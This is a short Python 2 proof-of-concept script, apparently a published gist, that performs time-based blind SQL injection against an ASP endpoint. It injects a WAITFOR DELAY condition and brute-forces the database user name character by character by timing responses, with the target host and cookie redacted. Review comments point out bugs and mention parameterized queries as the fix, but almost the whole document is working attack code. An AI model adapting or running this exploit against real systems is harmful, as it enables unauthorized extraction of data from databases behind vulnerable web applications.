exploit to extract data with SQLi
#!/usr/bin/env python | |
# XXXX.asp time-based SQL injection PoC exploit | |
# Rafal 'bl4de' Janicki | |
import requests | |
# Base URL of the probed endpoint. The host is redacted in the published
# gist; as written ('REDACTED ' followed by an empty port) the literal is
# not a usable URL and must be replaced before the script does anything.
base_url = 'http://REDACTED :/'
# Sleep duration (hh:mm:ss) the injected WAITFOR DELAY uses when the
# guessed prefix matches. The loop below treats a response slower than
# 8 seconds as the TRUE answer, so this value and that threshold must agree.
delayed = '00:00:08'
# Candidate characters tried, in this order, for every position.
# Note the letters read "...TUWVXYZ..." (V and W swapped) -- harmless for a
# brute-force set, but not alphabetical.
charset = 'ABCDEFGHIJKLMNOPQRSTUWVXYZabcdefghijklmnopqrstuwvxyz 1234567890-_@#$~'
# Injected suffix with two str.format placeholders: the guessed prefix and
# the delay. '%25' is the URL-encoded '%' so the LIKE wildcard survives
# transport. Defensive note: a WAITFOR DELAY token inside a request
# parameter is a common WAF/IDS signature, and the underlying flaw is
# removed by parameterized queries instead of server-side string concatenation.
query = "';IF (user_name() LIKE '{}%25') WAITFOR DELAY '{}'-- "
# Characters recovered so far; set to an already-known prefix to resume
# an earlier run (see the comment above the extraction loop).
payload = ''
def get_headers():
    """Return the HTTP headers sent with every probe request.

    The Cookie and Host values are placeholders ('XXXX' / 'XXXXX') in the
    published gist. NOTE(review): there is no comma after the 'Cookie'
    entry, so this dict literal does not parse as written; also
    'Upgrade-Insecure-Requests' is given as an int, whereas header values
    are normally strings -- confirm requests accepts it.
    """
    return {
        'Cookie': 'XXXX'
        'Host': 'XXXXX',
        'Pragma': 'no-cache',
        'Upgrade-Insecure-Requests': 1
    }
def make_request(url):
    """Issue a single GET to ``url`` with ``get_headers()`` and return the
    ``requests.Response``.

    No timeout is passed, so a connection that hangs blocks the whole
    extraction loop. The caller never reads the body; only the response
    timing is used.
    """
    resp = requests.get(url, headers=get_headers())
    return resp
def measure_response_time(resp):
    """Return ``resp.elapsed`` as float seconds.

    ``requests`` measures ``elapsed`` from sending the request until the
    response headers arrive. This is the timing oracle for the whole
    script, so any network or server latency above the caller's 8 s
    threshold registers as a false positive.
    """
    return resp.elapsed.total_seconds()
# Python 2 print statements: this script does not run under Python 3.
print "[+] Query: {}".format(query.format('', delayed))
# NOTE: this prints the unformatted template, not a URL that is actually
# requested; the loop below fills the placeholders first.
print "[+] URL called: {}".format(base_url + query)
print "[+] delay in time-based IF set to: {}".format(delayed)
# We extract 10 characters in one script run. If the string is longer than
# 10 chars, the script can be re-run with the initial payload set to the
# already-found string, so the first iteration looks for the 11th char and
# so on; or just increase the max in the range() call.
for i in range(0, 10):
    for c in charset:
        url = base_url + query.format(payload + c, delayed)
        resp = make_request(url)
        # A response slower than the injected delay means the LIKE prefix
        # matched: keep the character and move to the next position.
        # If no character at a position exceeds 8 s the inner loop simply
        # exhausts charset and nothing is appended, so the final string can
        # be shorter than 10 characters with no warning. The threshold
        # must match the 'delayed' value defined above.
        if measure_response_time(resp) > 8:
            payload = payload + c
            print "[+] found character: {} - current string is {}".format(c, payload)
            break
print "[+] final: {}".format(payload)